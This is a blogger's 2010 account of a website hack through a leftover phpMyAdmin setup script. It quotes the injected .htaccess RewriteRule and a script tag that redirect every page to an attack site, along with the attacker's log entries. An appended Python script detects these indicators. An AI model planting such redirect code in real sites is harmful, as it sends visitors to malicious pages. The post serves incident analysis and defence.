I've been hacked!

Today – at 4:26pm (server time) my site was hacked.

All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)

After trying to figure out how they got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin.  They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN.  There.  I feel a bit better.

Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups.  Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).

I really can't believe that the installation script was left after the system admins made the image for my VPS.  Really dumb.  As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed.  I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating. 

The final attack updated all .htaccess files to include:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php


And they inserted the following in the base of the index.php and index.html files for each folder:

<script>document.location.href='http://webarh.com/z.php';</script>


The log files show a single GET and then POST to the file:

174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 - "-" "-"

That's it.  That's the hacker.   The host manager has been notified.
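As an added example (not part of the original post), here is a small Python triage script that checks for the three indicators described above: a RewriteRule pointing at a foreign host, an inline script that forces document.location, and access-log hits on the exposed setup.php script. The sample inputs are constructed from the indicators quoted in the post; the own-host name example.org is a placeholder for the site's real hostname.

```python
import re
from urllib.parse import urlparse

# Constructed sample inputs, built from the indicators quoted in the post.
HTACCESS = """RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php
"""
INDEX_HTML = ("<html><body>Hello</body></html>\n"
              "<script>document.location.href='http://webarh.com/z.php';</script>")
ACCESS_LOG = [
    '174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"',
    '174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 - "-" "-"',
    '10.0.0.5 - - [17/Oct/2010:16:30:01 -0400] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',  # benign, constructed
]

# RewriteRule <pattern> <target>: capture the target so we can inspect its host.
REWRITE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I | re.M)
# Inline JS that rewrites the browser location to a fixed URL.
JS_REDIRECT_RE = re.compile(r"document\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Common Log Format: ip ident user [date] "method path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def external_rewrite_targets(htaccess, own_hosts):
    """Return RewriteRule targets that are absolute URLs to hosts other than our own."""
    hits = []
    for target in REWRITE_RE.findall(htaccess):
        host = urlparse(target).hostname
        if host and host.lower() not in own_hosts:
            hits.append(target)
    return hits

def injected_js_redirects(html):
    """Return URLs that an inline script forces document.location to."""
    return JS_REDIRECT_RE.findall(html)

def setup_script_hits(log_lines):
    """Return (ip, method, path, status) for every request touching a setup.php script."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(4).lower().endswith('/scripts/setup.php'):
            hits.append((m.group(1), m.group(3), m.group(4), int(m.group(5))))
    return hits

if __name__ == '__main__':
    print(external_rewrite_targets(HTACCESS, {'example.org'}))  # placeholder own host
    print(injected_js_redirects(INDEX_HTML))
    for hit in setup_script_hits(ACCESS_LOG):
        print(hit)
```

On a live server you would feed every .htaccess and index.* under the web root through the first two functions and the access log through the third; a GET followed by a POST to setup.php from one address, as in the post, is the pattern to look for.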
